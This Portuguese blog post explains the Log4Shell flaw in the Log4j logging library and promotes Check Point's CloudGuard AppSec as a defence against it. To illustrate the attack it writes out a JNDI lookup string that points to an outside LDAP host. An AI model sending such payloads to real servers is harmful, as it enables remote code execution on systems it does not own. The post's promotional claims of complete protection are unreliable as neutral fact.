Grandes corporações como Twitter, Steam, Apple, Minecraft, Amazon, Tencent, NetEase, Elastic e Baidu já identificaram que estão vulneráveis a ataques Log4Shell, que afeta a estrutura de registro de código aberto Log4j. Vale destacar que milhares de empresas e serviços menores também devem estar comprometidos sem saber ainda.
VEJA TAMBÉM: NGFW: O que é o Next Generation Firewall?
O que é Log4j?
A estrutura de registro de código aberto Log4j é uma biblioteca muito utilizada por diversas empresas em seus aplicativos web. O Log4j é a biblioteca de registro Java mais popular do mundo, com mais de 400.000 downloads no GitHub. A ferramenta é usada por grandes empresas como Twitter, Amazon, Microsoft, Apple, Minecraft, Cloudflare e milhares de outros.
O que foi explorado?
A Apache Software Foundation classificou a vulnerabilidade conhecida como Log4Shell ou LogJam como “crítica” e publicou uma atualização na tentativa de conter explorações futuras. Log4Shell também recebeu a pontuação CVSS máxima de 10. Em comunicado a fundação disse:
Um invasor que pode controlar mensagens de log ou parâmetros de mensagem de log pode executar código arbitrário carregado de servidores LDAP quando a substituição de pesquisa de mensagem está habilitada. A partir do Log4j 2.15.0, este comportamento foi desabilitado por padrão.
Como são os ataques?
Logs não costumam ser usados como vetores de ataque, e é por isso que essa vulnerabilidade pegou tantas organizações de surpresa. Nesse caso, a vulnerabilidade Log4Shell está contida em um plug-in de pesquisa que oferece uma maneira para aplicativos Java recuperarem objetos armazenados em um diretório DNS ou LDAP. O plug-in JNDI Lookup contém a vulnerabilidade Log4Shell, em geral, as consultas devem incluir apenas o nome do objeto. Porém, quando uma URL é inserida em vez do nome do objeto, por exemplo, $ {jndi: ldap: //website.com/rce}, Log4j se conectará ao JNDI no servidor especificado e obterá o objeto Java, permitindo assim a execução remota de código no servidor de registro.
CloudGuard AppSec - Proteção preventiva para seus aplicativos web
Os clientes da Check Point que usam CloudGuard AppSec configurados no modo Prevent estão protegidos contra ataques de zero-day. O mecanismo de inteligência artificial (IA) contextual que alimenta a solução reconhece automaticamente qualquer tentativa de explorar a ferramenta Log4j e a bloqueia - muito antes de a vulnerabilidade Log4Shell ser detectada ou explorada.
Ao contrário dos WAFs tradicionais, que geram muitos falsos positivos, o CloudGuard AppSec oferece precisão de prevenção. A solução também inclui proteção IPS com tecnologia Threat Cloud, garantindo que todos os aplicativos web sejam protegidos automaticamente sem a necessidade de implementar, atualizar proativamente ou instalar nada.
VEJA TAMBÉM: ThreatCloud: O que é e como funciona?
O mecanismo de IA contextual do CloudGuard cria uma pontuação de risco para cada solicitação ao aplicativo. Ao considerar todos os parâmetros contextuais de uma solicitação a solução consegue identificar com precisão um ataque sem intervenção humana. O CloudGuard constrói essa pontuação de risco aprendendo com o uso do aplicativo ao longo do tempo, e o resultado é uma segurança preventiva que filtra falsos positivos enquanto oferece prevenção contra ataques zero-day. Ou seja, a vulnerabilidade Log4Shell teve impacto zero nos clientes CloudGuard AppSec que estão automaticamente protegidos contra esses tipos de ataques.
Fontes: Check Point Blog e The Hacker News
Conheça nossas soluções avançadas, robustas e seguras de NOC & SOC, Zero Trust, Next-Gen Firewalls, LGPD, Hardware, Monitoramento de Rede, Transferência de Arquivos Gerenciada, Consultoria de TIC, Treinamentos, Sustentação de Aplicações, Outsourcing, Licenciamento Geral e Help Desk.